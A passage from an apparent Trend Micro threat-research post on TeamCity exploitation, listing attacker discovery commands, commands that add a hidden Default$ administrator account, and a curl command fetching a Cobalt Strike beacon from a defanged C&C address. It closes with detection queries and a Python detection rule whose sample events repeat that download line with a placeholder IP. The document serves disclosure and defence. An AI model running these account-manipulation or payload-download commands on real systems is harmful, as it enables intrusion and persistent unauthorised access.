TrendMicro

TeamCity Vulnerability Exploits Lead to Jasmin Ransomware, Other Malware Types

Executing domain discovery and persistence commands

Aside from malware deployment, we have also seen several attempts to discover network infrastructure and to establish persistence, with the commands spawned by the java.exe process running under a vulnerable TeamCity server directory.

Parent Process:
C:\TeamCity\jre\bin\java.exe

We observed the following subject processes being used for discovery and persistence tactics:

  • C:\WINDOWS\system32\net.exe group /domain
  • C:\WINDOWS\system32\net1.exe localgroup Administratoren /add Default$
  • C:\WINDOWS\system32\net1.exe localgroup Administrators /add Default$
  • C:\WINDOWS\system32\net1.exe user /add Default$ GH{redacted}23gwg
  • C:\WINDOWS\system32\net1.exe user /del defaultuser0
  • C:\WINDOWS\system32\net1.exe user /domain
  • C:\WINDOWS\system32\net1.exe user administrator
  • C:\WINDOWS\system32\net1.exe user default$
  • C:\WINDOWS\system32\nltest.exe /domain_trusts

Several of these commands involve attempts to manipulate user accounts, groups, and permissions, which are typical actions taken by attackers seeking to gain unauthorized access to a system. The attempt to add a user to the local Administrators group is particularly concerning, since it could grant elevated privileges to attackers and help them establish a foothold in the system that can be used to maintain access over an extended period.

Deploying Cobalt Strike beacons

Finally, we found threat actors deploying Cobeacon to vulnerable TeamCity servers. In one of the environments with a vulnerable TeamCity server, we found that a beacon (SHA1: db6bd96b152314db3c430df41b83fcf2e5712281) was deployed.

The beacon was downloaded using the command curl hxxp://83[.]97[.]20[.]141:81/beacon.out -o .conf and was saved in the path C:\TeamCity\bin\.conf.

This was detected by the Trend Pattern Backdoor.Linux.COBEACON.SMYXDKV. The beacon reaches out to the C&C server 83[.]97[.]20[.]141, which we have already proactively detected as of this writing.

Conclusion

The active exploitation of vulnerabilities within TeamCity On-Premises represents a critical threat to organizations relying on this platform for their CI/CD processes. Our telemetry has revealed that threat actors are exploiting these vulnerabilities to deploy ransomware, coinminers, and backdoor payloads on compromised TeamCity servers.

This malicious activity not only jeopardizes the confidentiality, integrity, and availability of sensitive data and critical systems but also imposes financial and operational risks on affected organizations. Swift action is imperative to mitigate these vulnerabilities and prevent further damage from ransomware extortion and other types of malware.

The following protections exist to detect malicious activity and shield Trend customers against the exploitation of the TeamCity On-Premises vulnerabilities discussed in this entry.

  • 43957 – HTTP: JetBrains TeamCity Directory Traversal Vulnerability
  • 43958 – HTTP: JetBrains TeamCity Authentication Bypass Vulnerability

  • 5011 – CVE-2024-27198 – JetBrains TeamCity Auth Bypass Exploit – HTTP (Response)
  • 5012 – CVE-2024-27199 – JetBrains TeamCity Directory Traversal Exploit – HTTP (Response)

  • 1011995 – JetBrains TeamCity Authentication Bypass Vulnerability (CVE-2024-21798)
  • 1011996 – JetBrains TeamCity Directory Traversal Vulnerability (CVE-2024-21799)

Trend Vision One queries (each description is followed by its query):

  • Jasmin ransomware file encryption event
    eventSubId:101 AND processFilePath:abc.exe AND objectFilePath:.lsoc
  • Service installation of the Monero miner's dropped kernel driver as seen from the registry
    eventSubId:402 and tags:XSAE.F7460 and objectRegistryData:WinRing0x64.sys
  • Decoding of encrypted components dropped by the Monero miner MSI package through certutil.exe
    eventSubId:2 and processCmd:IndexStore.bat and objectCmd:("certutil" and "decode")
  • Execution of the SparkRAT malware from the batch file
    eventSubId:2 and processFilePath:cmd.exe and processCmd:win.bat and objectCmd:windowDefenSrv
  • Detection of suspicious process invocations from a TeamCity process
    eventSubId:2 AND processCmd:TeamCity AND objectCmd:("powershell" OR "net" OR "nltest" OR "msiexec")
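The last query above, and the discovery and persistence commands listed earlier, can be expressed as a host-side rule: alert when java.exe under the TeamCity directory spawns net, net1, nltest, curl, powershell or msiexec, and raise severity when the command line manipulates accounts or writes a download to disk. The following is an added example written for this entry, not Trend code or a Vision One query; the child-process list, severity patterns and sample events are assumptions, and 198.51.100.7 is a documentation-range placeholder.

```python
import ntpath
import re

# Parent process from the post: java.exe anywhere under the TeamCity install directory.
TEAMCITY_PARENT = re.compile(r"^[a-z]:\\TeamCity\\.*\\java\.exe$", re.IGNORECASE)

# Child binaries seen in the post (net, net1, nltest, curl) plus the ones its
# Vision One query also watches (powershell, msiexec). Assumed list; extend as needed.
SUSPICIOUS_CHILDREN = {"net.exe", "net1.exe", "nltest.exe", "curl.exe",
                       "powershell.exe", "msiexec.exe"}

# Command lines that raise severity: account or group manipulation, and a download
# written to disk (as with the beacon saved as .conf under TeamCity\bin).
HIGH_SEVERITY = [re.compile(r"\blocalgroup\s+\S+\s+/add\b", re.IGNORECASE),
                 re.compile(r"\buser\s+/(add|del)\b", re.IGNORECASE),
                 re.compile(r"\s-o\s+\S+", re.IGNORECASE)]

def classify(parent, image, cmd):
    """Return None (no alert), 'medium' or 'high' for one process-creation event."""
    if not TEAMCITY_PARENT.match(parent):
        return None
    if ntpath.basename(image).lower() not in SUSPICIOUS_CHILDREN:
        return None
    return "high" if any(p.search(cmd) for p in HIGH_SEVERITY) else "medium"

def scan(events):
    """Return (severity, command line) for each (parent, image, cmd) that matches."""
    hits = []
    for parent, image, cmd in events:
        sev = classify(parent, image, cmd)
        if sev:
            hits.append((sev, cmd))
    return hits

# Constructed sample events shaped like EDR process-creation telemetry
# (parent image, child image, child command line); not telemetry from the post.
JAVA = r"C:\TeamCity\jre\bin\java.exe"
SAMPLE_EVENTS = [
    (JAVA, r"C:\WINDOWS\system32\net.exe", "net.exe group /domain"),
    (JAVA, r"C:\WINDOWS\system32\net1.exe", "net1.exe localgroup Administrators /add Default$"),
    (JAVA, r"C:\WINDOWS\system32\nltest.exe", "nltest.exe /domain_trusts"),
    # 198.51.100.7 is a documentation-range placeholder, not the post's C&C address
    (JAVA, r"C:\WINDOWS\system32\curl.exe", "curl http://198.51.100.7:81/beacon.out -o .conf"),
    (JAVA, JAVA, "java.exe -jar buildAgent.jar"),                       # benign child
    (r"C:\WINDOWS\explorer.exe", r"C:\WINDOWS\system32\net.exe", "net.exe user /domain"),  # not TeamCity
]

if __name__ == "__main__":
    for sev, cmd in scan(SAMPLE_EVENTS):
        print(f"[{sev.upper()}] {cmd}")
```

Run against the constructed events it flags the four TeamCity-spawned commands (two medium, two high) and ignores the java.exe child and the console-launched net.exe.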
